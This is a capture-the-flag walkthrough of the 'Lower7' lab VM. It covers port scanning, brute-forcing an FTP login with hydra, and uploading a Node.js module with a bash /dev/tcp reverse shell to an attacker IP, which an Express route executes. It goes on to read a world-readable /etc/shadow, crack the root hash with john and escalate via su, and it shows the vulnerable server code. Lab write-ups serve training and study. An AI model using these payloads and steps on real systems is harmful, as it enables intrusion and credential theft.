# Lab setup

Download address: Lower7

Download and import the VM, set the network adapter to NAT mode, and start the fight.

IP: 10.10.10.6

# Penetration process

# Initial information gathering

First, scan all TCP ports to see what is open:

```
┌──(root㉿kali)-[~]
└─# nmap -p- -sS -T4 10.10.10.6 -v
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 21:15 EDT
Initiating ARP Ping Scan at 21:15
Scanning 10.10.10.6 [1 port]
Completed ARP Ping Scan at 21:15, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.00s elapsed
Initiating SYN Stealth Scan at 21:15
Scanning 10.10.10.6 [65535 ports]
Discovered open port 21/tcp on 10.10.10.6
Discovered open port 3000/tcp on 10.10.10.6
Completed SYN Stealth Scan at 21:15, 1.92s elapsed (65535 total ports)
Nmap scan report for 10.10.10.6
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
3000/tcp open  ppp
MAC Address: 08:00:27:1D:A7:E0 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
```

Two ports are open. Next, run a version scan against them to identify the services:

```
┌──(root㉿kali)-[~]
└─# nmap -p- -sV -T4 10.10.10.6 -v
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-21 21:16 EDT
NSE: Loaded 46 scripts for scanning.
Initiating ARP Ping Scan at 21:16
Scanning 10.10.10.6 [1 port]
Completed ARP Ping Scan at 21:16, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.00s elapsed
Initiating SYN Stealth Scan at 21:16
Scanning 10.10.10.6 [65535 ports]
Discovered open port 21/tcp on 10.10.10.6
Discovered open port 3000/tcp on 10.10.10.6
Completed SYN Stealth Scan at 21:16, 4.12s elapsed (65535 total ports)
Initiating Service scan at 21:16
Scanning 2 services on 10.10.10.6
Completed Service scan at 21:17, 11.09s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.6.
Initiating NSE at 21:17
Completed NSE at 21:17, 0.03s elapsed
Initiating NSE at 21:17
Completed NSE at 21:17, 0.01s elapsed
Nmap scan report for 10.10.10.6
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
3000/tcp open  http    Node.js (Express middleware)
MAC Address: 08:00:27:1D:A7:E0 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.11 seconds
           Raw packets sent: 65541 (2.884MB) | Rcvd: 65541 (2.622MB)
```

So port 21 is vsftpd and port 3000 is an Express application running on Node.js.

# Exploitation

# FTP service

First, connect to FTP to get a feel for it:

```
┌──(root㉿kali)-[~]
└─# ftp [email protected]
Connected to 10.10.10.6.
220 "Hello a.clark, Welcome to your FTP server."
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
```

Tried 123456, no luck. But the welcome banner gives away a username: a.clark.

Next step: brute force.

# Brute-forcing FTP

Brute-force a.clark's password with hydra against rockyou; the password turns out to be dragon:

```
┌──(root㉿kali)-[~]
└─# hydra -t 64 -l a.clark -P /usr/share/wordlists/rockyou.txt ftp://10.10.10.6
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-21 21:55:54
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ftp://10.10.10.6:21/
[21][ftp] host: 10.10.10.6   login: a.clark   password: dragon
^C
```

# Reverse shell

Prepare a small Node module that spawns a reverse shell when the server loads it, upload it over FTP as a.clark, and then request it on port 3000 (why this works is covered in the analysis section at the end):

```
┌──(root㉿kali)-[~]
└─# cat shell.js
const { exec } = require('child_process');
module.exports = (req, res) => {
  exec('bash -i >& /dev/tcp/10.10.10.4/12138 0>&1', (error, stdout) => {
    res.send(`${stdout.trim()}`);
  });
};

┌──(root㉿kali)-[~]
└─# ftp a.clark@10.10.10.6
Connected to 10.10.10.6.
220 "Hello a.clark, Welcome to your FTP server."
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> del shell.js
250 Delete operation successful.
ftp> put shell.js 
local: shell.js remote: shell.js
229 Entering Extended Passive Mode (|||38942|)
150 Ok to send data.
100% |********************************************************|   190        2.70 MiB/s    00:00 ETA
226 Transfer complete.
190 bytes sent in 00:00 (134.45 KiB/s)
ftp> bye
221 Goodbye.

┌──(root㉿kali)-[~]
└─# curl http://10.10.10.6:3000/shell.js
┌──(root㉿kali)-[~]
└─# nc -lnvp 12138
listening on [any] 12138 ...
connect to [10.10.10.4] from (UNKNOWN) [10.10.10.6] 46006
whoami
a.clark
grep root /etc/shadow
root:$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD:20374:0:99999:7:::
```

The shell comes back as a.clark, and /etc/shadow is readable by this unprivileged user (it should be readable only by root), which hands us the root password hash.

# Cracking the root hash

The hash is yescrypt (the `$y$` prefix), so run john with `--format=crypt` against rockyou. The root password is bassman:

```
┌──(root㉿kali)-[~]
└─# echo '$y$j9T$9VFLJjKZix0Ugj9YsoOCS.$z0FVk.1CCNx/YRzEmwjcz6z4oYqa7YD6QyXd52jxyLD' > hash

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt hash
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bassman          (?)     
1g 0:00:01:55 DONE (2025-10-21 22:11) 0.008662g/s 145.5p/s 145.5c/s 145.5C/s ice-cream..yenifer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

# Upgrading the shell

Upgrade the reverse shell to a fully interactive TTY:

```
┌──(root㉿kali)-[~]
└─# nc -lnvp 12138
listening on [any] 12138 ...
connect to [10.10.10.4] from (UNKNOWN) [10.10.10.6] 55678
script /dev/null -c bash
Script iniciado, el fichero de anotación de salida es '/dev/null'.
a.clark@lower7:~$ ^Z
zsh: suspended  nc -lnvp 12138

┌──(root㉿kali)-[~]
└─# stty raw -echo;fg
[1]  + continued  nc -lnvp 12138
                                reset xterm
a.clark@lower7:~$ export TERM=xterm-256color
a.clark@lower7:~$ source .bashrc
```

# Escalating to root

Switch to root with the cracked password bassman and read the flag:

```
a.clark@lower7:~$ su -
Contraseña: 
root@lower7:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@lower7:~# ls -al
total 32
drwx------  5 root root 4096 oct 13 15:41 .
drwxr-xr-x 18 root root 4096 oct 13 10:41 ..
lrwxrwxrwx  1 root root    9 nov 15  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3526 nov 15  2023 .bashrc
drwxr-xr-x  3 root root 4096 nov 15  2023 .local
drwxr-xr-x  4 root root 4096 oct 13 11:04 .npm
-rw-r--r--  1 root root  161 jul  9  2019 .profile
-r--------  1 root root   33 oct 13 15:16 root.txt
drwx------  2 root root 4096 oct 13 15:41 .ssh
root@lower7:~# cat root.txt
97b79229372dea359415afef3e350241
```

# Analysis

The reason the Node service on port 3000 executes our JS lies in /opt/site/index.js.

Its `/:script` route takes the request path, checks only that it ends in `.js` and exists under the pages directory, and then require()s the file and calls the exported function. The file a.clark uploads over FTP ends up in that directory, so the uploaded shell.js is loaded and run inside the server process (which, as whoami showed, runs as a.clark):

```
a.clark@lower7:/opt/site$ cat index.js 
const express = require('express');
const fs = require('fs');
const path = require('path');
const app = express();
const PORT = 3000;
const PAGES_DIR = path.join(__dirname, 'pages');
app.get('/', (req, res) => {
  res.send(`
<html>
<body>
  <h1>It works!</h1>
  <p>This is the default web page for this server.</p>
  <p>The web server software is running but no content has been added, yet.</p>
</body>
</html>
  `);
});
app.get('/:script', (req, res) => {
  const scriptName = req.params.script;
  const scriptPath = path.join(PAGES_DIR, scriptName);
  if (!scriptName.endsWith('.js') || !fs.existsSync(scriptPath)) {
    res.status(404).send('File not found...');
    return;
  }
  try {
    delete require.cache[require.resolve(scriptPath)];
    const page = require(scriptPath);
    if (typeof page === 'function') {
      page(req, res);
    } else {
      res.status(500).send('The module does not export a function.');
    }
  } catch (err) {
    res.status(500).send('Error executing script.');
  }
});
app.listen(PORT, '0.0.0.0', () => {
});
```